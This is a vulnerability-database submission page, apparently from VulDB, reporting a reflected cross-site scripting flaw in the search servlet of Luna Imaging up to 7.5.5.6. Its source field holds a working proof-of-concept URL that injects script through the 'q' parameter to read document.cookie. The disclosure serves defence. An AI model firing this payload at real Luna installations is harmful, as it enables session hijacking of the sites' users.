| Título | Luna Imaging, Inc. Luna Imaging 7.5.5.x Cross Site Scripting |
|---|
| Descrição | Hi,
I identified a vulnerability in luna imagic inc, where it was possible to trigger an xss via get.
https://software.lunaimaging.com/software/x.x.x.x/
[email protected] |
|---|
| Fonte | ⚠️ https://example.com/luna/servlet/view/search?search=Enviar&cat=0&q=%22%27%3C/script%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E%3Casd%3E&dateRangeStart=&dateRangeEnd=%3Casd%3E&annotSearch=annotSearch |
|---|
| Utilizador | chor4o (UID 52584) |
|---|
| Submissão | 07/06/2025 01h33 (há 10 meses) |
|---|
| Moderação | 19/06/2025 08h11 (12 days later) |
|---|
| Estado | Aceite |
|---|
| Entrada VulDB | 313272 [Luna Imaging até 7.5.5.6 search q Script de Site Cruzado] |
|---|
| Pontos | 15 |
|---|